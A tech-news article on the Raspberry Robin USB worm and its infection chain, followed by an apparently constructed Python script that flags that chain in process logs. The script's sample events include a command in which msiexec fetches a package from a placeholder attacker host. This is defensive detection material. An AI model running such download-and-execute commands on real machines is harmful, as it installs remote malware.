Beware of some USB keys! This malware can take over your PC in no time


Thibaut Keutchayan

May 13, 2022 at 11:52 a.m.


Be very careful with the files on any USB key you handle. © Shutterstock

Raspberry Robin is, alas, not the name of a new variety of raspberry, but that of a computer worm, i.e. malicious software that uses the network to replicate itself across several devices, which Red Canary has been tracking for nearly nine months.

The main problem with Raspberry Robin is that it spreads mainly through compromised removable storage, such as USB drives: an age-old method that is still just as effective.

A new worm has USB keys as its main host

Vigilance is, once again, in order. Red Canary says it is tracking a worm that spreads through removable storage devices carried from machine to machine. The first challenge is its ease of transmission: it is very easy to plug a key into a computer without running an antivirus scan first, all the more so in a climate of trust, for example at work.

Very insidious, this worm, named Raspberry Robin, abuses and deceives Microsoft’s software installation and uninstallation engine, Windows Installer. The infection begins with a removable drive containing a malicious file with the extension “.lnk”, which is normally used for shortcuts to perfectly legitimate files. The files copied from the USB key to the computer, including the malicious ones, are then executed by the victim via cmd.exe.

Finally, Windows Installer (msiexec.exe) will, despite itself, help the worm reach its command-and-control servers (known as C2). According to Red Canary, Raspberry Robin’s C2 framework uses Tor exit nodes.

For the time being, it is difficult to understand the intentions behind this virus.

The worm’s end goal appears to be to drop a malicious software library (DLL). The rundll32.exe utility then, again despite itself, executes that DLL, which in practice helps keep the malware on the infected device. This is the main lead followed by Red Canary’s researchers, but as the investigation is still ongoing, this hypothesis may change.

The question also remains as to the purpose sought by the hackers behind this malware. Red Canary first detected this worm in September 2021 and has observed its presence growing on many devices since January 2022. Fortunately, Red Canary already publishes, on its site, several means of detecting this virus.
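The chain described above (cmd.exe running content from the USB key, msiexec.exe reaching out to a remote package, rundll32.exe loading the dropped DLL) turned into simple process-creation detection rules, as an added example that is not Red Canary's published detection content; the event format, drive-letter assumption, paths and the placeholder URL are all constructed.

```python
"""Constructed example (not Red Canary's detections): flag the process chain the
article describes. Each record is a simplified process-creation event; images,
paths, drive letters and the URL are sample values chosen for illustration."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the created process
    cmdline: str  # full command line as logged

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumption: removable media mounts on a non-system drive letter (D: onward).
REMOVABLE_RE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(r"c:\\windows\\", re.IGNORECASE)

def classify(ev: ProcEvent) -> list[str]:
    """Return the name of every rule the event matches (empty list if benign)."""
    findings = []
    image, parent = ev.image.lower(), ev.parent.lower()
    # Rule 1: cmd.exe launched from the shell, referencing a removable-drive path.
    if image == "cmd.exe" and parent == "explorer.exe" and REMOVABLE_RE.search(ev.cmdline):
        findings.append("cmd.exe executing content from a removable drive")
    # Rule 2: Windows Installer spawned by cmd.exe and pointed at a remote package.
    if image == "msiexec.exe" and parent == "cmd.exe" and URL_RE.search(ev.cmdline):
        findings.append("msiexec.exe fetching a package from a remote URL")
    # Rule 3: rundll32.exe loading a DLL that does not live under C:\Windows.
    if image == "rundll32.exe" and ".dll" in ev.cmdline.lower() and not SYSTEM_DIR_RE.search(ev.cmdline):
        findings.append("rundll32.exe loading a DLL from a non-system path")
    return findings

def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run every rule over a batch of events; returns (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]

# Constructed sample telemetry; "c2.example.invalid" is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe", r'cmd.exe /c "E:\docs\invoice.cmd"'),
    ProcEvent("cmd.exe", "msiexec.exe", "msiexec.exe /q /i http://c2.example.invalid/pkg.msi"),
    ProcEvent("msiexec.exe", "rundll32.exe", r"rundll32.exe C:\ProgramData\updater\core.dll,Start"),
    ProcEvent("services.exe", "msiexec.exe", "msiexec.exe /V"),         # benign installer service
    ProcEvent("explorer.exe", "cmd.exe", r"cmd.exe /c dir C:\Users"),  # benign local command
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The two benign events produce no findings, so the rules key on the combination of parent, image and argument rather than on any single process name.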


Source : Red Canary
